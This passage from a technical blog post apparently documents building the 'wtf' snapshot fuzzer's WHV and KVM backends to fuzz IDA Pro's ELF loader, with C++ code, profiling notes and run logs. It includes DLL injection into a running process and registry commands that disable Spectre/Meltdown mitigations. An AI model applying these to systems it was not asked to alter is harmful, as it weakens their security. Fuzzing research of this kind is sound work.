start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input
REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.
REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"
REM Lock everything
lockmem.exe ida64.exe
REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe
```

### Problem 3: Manually soft page-faulting in memory from hooks

To insert my test cases in memory, I used the file system hook layer I described above as well as the virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call, let's say, fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs, it was clear that the PTE was in an invalid state. This is explained by the fact that memory is lazy on Windows. The page fault handler is expected to be invoked: it fixes the PTE itself and execution carries on. Because we are doing the memory write ourselves, we don't generate a page fault, and so the page fault handler doesn't get invoked.
To solve this, I try to do a virtual-to-physical translation and inspect the result. If the translation is successful, it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time, but this time the virtual-to-physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

```cpp
if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //   _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //   _Out_ PFILE_BASIC_INFORMATION FileInformation
          // );

          // ...

          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }
```

### Problem 4: KVA shadow

When I snapshot IDA, the CPU is in user-mode, but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs), and so there is no valid translation.
To solve this, I simply disabled KVA shadow with the registry edits below:

```
REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f
```

## Problem 5: Identifying bottlenecks

While developing wtf, I set aside time to profile the tool under specific workloads with the Intel VTune Profiler, which is now free. If you have never used it, you really should, as it is both fascinating and genuinely useful. If you care about performance, you need to measure to understand where you can have the most impact. Not measuring is a big mistake, because you will most likely spend time changing code that doesn't even matter. And if you optimize something, you should also be able to measure the impact of your change. For example, below is the VTune hotspot analysis report for the following invocation:

```
wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0
```

This report is really catastrophic: it means we spend twice as much time handling memory access faults as actually running target code, when fault handling should take very little time. If anybody knows their way around whv & performance, please reach out, because I really have no idea why it is that slow.

## The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would normally see in IDA's output window.
Below, you can see IDA load the elf64.dll loader, then initialize the database and the btree. It then loads processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

```
>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format=" bytes pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u total memory allocated ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub. The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o
```

# Need for speed: whv backend

At this point, I was able to fuzz IDA, but the speed was incredibly slow: about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc., but I felt I wouldn't find much at this speed. That's why I decided to implement an execution backend on top of whv. I had played around with whv before with pywinhv, so I knew the features offered by the API well. As this was the first execution backend using virtualization, I had to rethink a bunch of the fundamentals.

## Code coverage

What I settled for is one-time software breakpoints at the beginning of basic blocks. The user simply generates a list of breakpoint addresses into a JSON file, and wtf consumes this file during initialization. This means the user can selectively pick the modules they want coverage for. It is annoying, though, because you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py.
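The one-time breakpoint bookkeeping this scheme relies on can be sketched as follows (a hypothetical `CovBreakpoints_t` class, not wtf's actual implementation): each address from the JSON file gets an int3 patched in, and on the first hit the original byte is restored so the breakpoint never fires again.

```cpp
#include <cassert>
#include <cstdint>
#include <unordered_map>

// Hypothetical sketch of one-shot code-coverage breakpoints: each address
// gets an int3 (0xcc) patched over the original byte; on the first hit we
// restore the byte, drop the entry, and count the address as covered.
class CovBreakpoints_t {
  // Address -> original byte that the 0xcc replaced.
  std::unordered_map<uint64_t, uint8_t> Breakpoints_;
  uint64_t Covered_ = 0;

public:
  void Add(const uint64_t Address, uint8_t &Byte) {
    Breakpoints_.emplace(Address, Byte);
    Byte = 0xcc; // Patch in the breakpoint.
  }

  // Returns true if this was one of our coverage breakpoints.
  bool OnHit(const uint64_t Address, uint8_t &Byte) {
    auto It = Breakpoints_.find(Address);
    if (It == Breakpoints_.end()) {
      return false;
    }
    Byte = It->second; // Restore the original byte; the bp never refires.
    Breakpoints_.erase(It);
    Covered_++;
    return true;
  }

  uint64_t Covered() const { return Covered_; }
};
```

The pay-once property follows directly: once `OnHit` has restored a byte, subsequent executions of that basic block run at full speed.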
You could obviously generate the file yourself via other tools. Overall, I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage, though: filling the address space with int3s and lazily populating code, leveraging a length-disassembler engine to know the size of instructions. I loved this idea, but I ran into tons of problems with switch tables that embed data in code sections. wtf would corrupt them when setting software breakpoints, which led to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow, and whv doesn't expose the Monitor Trap Flag. The ideal for me would be to find a way to keep the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

## Dirty memory

The other thing I needed was the ability to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that, which was perfect.

## Tracing

One thing I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag, but if you turn on the trap flag before, let's say, a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR, stripping away the trap flag. After programming IA32_FMASK myself, I could trace through syscalls, which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens, the CPU saves the current context and loads a new one from the task segment, which doesn't have the trap flag set.
I can't remember if I got that working or if it turned out to be harder than it looked, but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

## Timeout

To protect the fuzzer against infinite loops and to limit execution time, I use a timer to tell the virtual processor to stop execution. This is not as good as what bochscpu offered us because it is not as precise, but it is the only solution I could come up with:

```cpp
class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                               nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};
```

## Inserting page faults

To insert a page fault into the guest, I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

```cpp
bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //
  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}
```

## Determinism

The last feature I wanted was to get as much determinism as I could. After tracing a bunch of executions, I realized nt!ExGenRandom uses rdrand in the Windows kernel, and this was a big source of non-determinism across executions. Intel does support generating a vmexit when the instruction is executed, but this is not exposed by whv either. I settled for a breakpoint on the function and emulating its behavior with a deterministic implementation:

```cpp
//
// Make ExGenRandom deterministic.
//
// kd> ub fffff8053b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff8053b8287c0 480fc7f2        rdrand  rdx
//
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}
```

I am not a huge fan of this solution because it means you need to know where the non-determinism is coming from, which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues, but it might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end, which was great. Below I describe some of the problems I solved while testing it.
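On the determinism point above: the `Rdrand()` helper isn't shown in the post, but any PRNG seeded identically across runs would do the job of making the breakpoint-emulated `nt!ExGenRandom` reproducible. A hypothetical sketch using the splitmix64 mixing function (this is an assumption, not wtf's actual implementation):

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical deterministic stand-in for the rdrand instruction: a
// splitmix64 generator whose state starts identically on every run, so two
// executions of the same test case observe the same "random" stream.
class Rdrand_t {
  uint64_t State_ = 0;

public:
  uint64_t Next() {
    State_ += 0x9e3779b97f4a7c15ULL;
    uint64_t Z = State_;
    Z = (Z ^ (Z >> 30)) * 0xbf58476d1ce4e5b9ULL;
    Z = (Z ^ (Z >> 27)) * 0x94d049bb133111ebULL;
    return Z ^ (Z >> 31);
  }
};
```

Two backends constructed the same way return byte-identical streams, which is exactly the property the fuzzer needs to keep executions stable.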
## Problem 6: Code coverage breakpoints are not free

Profiling wtf revealed that the code coverage breakpoints I thought were free were not quite so. In theory, they are one-time breakpoints, so you only pay their cost once: a warm-up cost at the start of a run while the fuzzer discovers the highly reachable parts of the code, amortizing to nothing over time.

The problem in my implementation was in the code that restores those breakpoints after executing a test case. I tracked the not-yet-hit code coverage breakpoints in a list; when restoring, I would first restore every dirty page and then iterate through this list to reset the code-coverage breakpoints. It turns out this is highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint both in this copy and in the guest RAM.

```cpp
//
// Add a breakpoint to a GPA.
//
uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //
  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //
  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //
  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //
  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}
```

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations:

```cpp
//
// Remove a breakpoint from a GPA.
//
void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //
  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //
  *Cache = *Virgin;
}
```

When you restore dirty memory, you simply iterate through the dirty pages and ask the Ram_t class to restore their content. Internally, the class checks if the page has been duplicated and, if so, restores from this copy; otherwise it restores the content from the dump file. This lets us restore code coverage breakpoints at an extra memory cost:

```cpp
//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//
const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //
  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //
  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //
  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //
  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //
  return DstHva;
}
```

## Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf consumes. At first, I thought this was a bulletproof technique, but I encountered a pretty annoying bug where IDA tagged switch-tables as code instead of data. This led to wtf corrupting switch-tables with cc's, and to the guest crashing in spectacular ways. I haven't run into this bug with the latest version of IDA yet, which is nice.

## Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons. To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and tracking dirtiness when receiving a memory fault caused by a write:

```cpp
HRESULT WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //
  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}
```

Once fixed, I noticed that WHvTranslateGva was also slower than I expected.
This is why I also emulated its behavior by walking the page tables myself:

```cpp
HRESULT WhvBackend_t::TranslateGva(const Gva_t Gva,
                                   const WHV_TRANSLATE_GVA_FLAGS,
                                   WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                                   Gpa_t &Gpa) const {
  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //
  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //
  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //
  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}
```

## Collecting dividends

Comparing the two backends, whv showed about 15x better performance than bochscpu. I honestly was a bit disappointed, as I had expected more of a 100x increase, but it was still a significant improvement:

```
bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0
```

The speed started to be good enough for me to run it overnight and discover my first few crashes, which was exciting even though they were just interr.

# 2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't widespread or cheap. On top of that, I was still disappointed by whv's performance, so I was eager to see how battle-tested hypervisors like Xen or KVM would measure up. I didn't know anything about those VMMs, but I quickly discovered that KVM is available in the Linux kernel and exposes a user-mode API resembling whv via /dev/kvm. This looked perfect: if it was similar enough to whv, I could probably write a backend for it easily.
The KVM API powers Firecracker, a project that creates micro-VMs to run various workloads in the cloud. I assumed you would need both rich features and good performance to be the foundational technology of such a project.

The KVM API works very similarly to whv, so I will not repeat the previous part; instead, I will walk you through some of the differences and the things I enjoyed more with KVM.

## GPRs available through shared-memory

To avoid issuing an IOCTL every time you want the value of a guest GPR, KVM allows you to map a memory region shared with the kernel where the registers are laid out:

```cpp
//
// Get the size of the shared kvm run structure.
//
VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//
Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == nullptr) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}
```

## On-demand paging

Implementing on-demand paging with KVM was very easy. It uses userfaultfd, so you can just start a thread that polls and services the requests:

```cpp
void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {
    //
    // Set up the pool fd with the uffd fd.
    //
    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {
      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //
      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //
    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //
    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //
    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //
    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //
    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //
    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They're atomic as
      // in guaranteeing that nothing can see an half copied page since it'll
      // keep userfaulting until the copy has finished.
      //
      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}
```

## Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When it does, I can program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalpPerfInterrupt:

```cpp
//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//
if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
